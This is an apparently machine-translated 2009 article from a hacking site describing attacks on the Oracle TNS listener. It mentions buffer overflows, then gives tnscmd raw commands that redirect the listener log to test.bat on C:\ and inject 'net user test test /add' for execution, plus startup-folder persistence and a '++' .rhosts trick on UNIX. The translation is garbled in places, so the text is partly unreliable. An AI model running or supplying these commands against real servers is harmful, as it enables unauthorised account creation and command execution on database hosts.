For the Oracle TNS listener attack methods of finishing-vulnerability warning-the black bar safety net

ID MYHACK58:62200922399
Type myhack58
Reporter 佚名
Modified 2009-03-05T00:00:00


First, depending on the version, the TNS listener may be more susceptible to a variety of types of buffer overflow attacks, these attacks can be in does not provide a user ID and password to be used. For example: in oracle 9i, when a client requests a long service_name,are vulnerable to overflow attacks. When the listener for the log to build the error message, service_name value will be copied to the A in the stack structure of the buffer, causing an overflow—overwrite the saved value of the return stack address. This practice can allow an attacker to gain control over it. In fact, the TNS listener ever have too much time overflow and format string vulnerabilities.

Secondly, another class of attacks and log files related. Only when not to the listener set a password, the attack will be effective.

Assuming that a listener does not set a password, the attack method is as follows:

tnscmd-h -p 1 5 2 1 –rawcmd “(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_directory)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=c:\\)))” the log directory is set to the C drive

tnscmd-h -p 1 5 2 1 –rawcmd “(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=test. bat)))” log file set to test. bat

tnscmd-h –rawcmd “(CONNECT_DATA=(( ||dir >test. txt||net user test test /add))”the command to

dir >test.txt and net user test test /add command, write c:\test. bat file, due to the double-vertical-line effect of the first command executed after the failure of the WINDOWS command interpreter executes the back command, the error message commented out, so that you can perform we submitted the command.

By setting the log file to a different directory, such as the WINDOWS startup directory, when the server restart will perform a malicious user to submit a specific code, thereby threatening it.

Running on UNIX systems on oracle will also be subject to the same threats. One method is the“++”back to the. rhost file, when the system is running, use the r*services command.